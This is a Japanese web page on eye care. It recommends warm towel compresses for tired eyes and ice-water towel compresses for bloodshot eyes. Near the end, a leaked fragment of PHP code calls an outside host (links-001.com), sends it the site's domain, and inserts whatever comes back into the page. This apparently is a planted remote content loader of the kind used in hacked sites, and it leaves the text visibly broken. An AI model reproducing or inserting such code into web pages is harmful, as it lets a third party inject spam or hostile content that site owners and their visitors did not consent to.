前へ
次へ

目の充血や疲れには適した温冷パックでリセットを

細かい文字を長い時間読んでいたり、スマートフォンやパソコン画面にくぎ付けだと、だんだん目がしょぼしょぼしてきます。
人前に出るときはアイメイクもバッチリで、目元美容にはぬかりなくても、一人で過ごす家の中だとつい目のケアも怠りがちです。
目にある血管が目を酷使したことで、血液の巡りが悪くなっているサインなので、目元のパックをして復活をさせます。
清潔なタオルを用意して、お湯で濡らしたら絞り、目を覆うようにしてホットタオルを乗せての簡単パックです。
暖かいタオルと蒸気で、目の周りの血管が自然に広がるので、緩やかに血液循環も良くなります。
充血をした疲れ目には、冷やすパックでの対処です。
目に炎症を起こしているのが充血状態なので、温めるのではなく冷やすようにします。
洗面器に氷水を作り、その中にタオルを入れて絞って目を覆うようにのせてのパックです。
氷がない時なら水でタオルを濡らして、しばらく冷蔵庫へ入れて冷やして使うことができます。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top